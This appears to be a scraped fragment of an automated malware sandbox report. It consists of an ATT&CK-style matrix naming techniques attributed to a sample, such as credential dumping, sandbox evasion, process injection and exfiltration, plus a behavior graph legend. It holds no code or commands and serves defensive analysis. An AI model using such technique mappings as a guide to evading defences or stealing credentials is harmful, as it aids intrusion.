            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection11Masquerading1OS Credential Dumping1Security Software Discovery321Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion22Credentials in Registry1Virtualization/Sandbox Evasion22Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerRemote System Discovery1SMB/Windows Admin SharesData from Local System1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSystem Information Discovery3Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet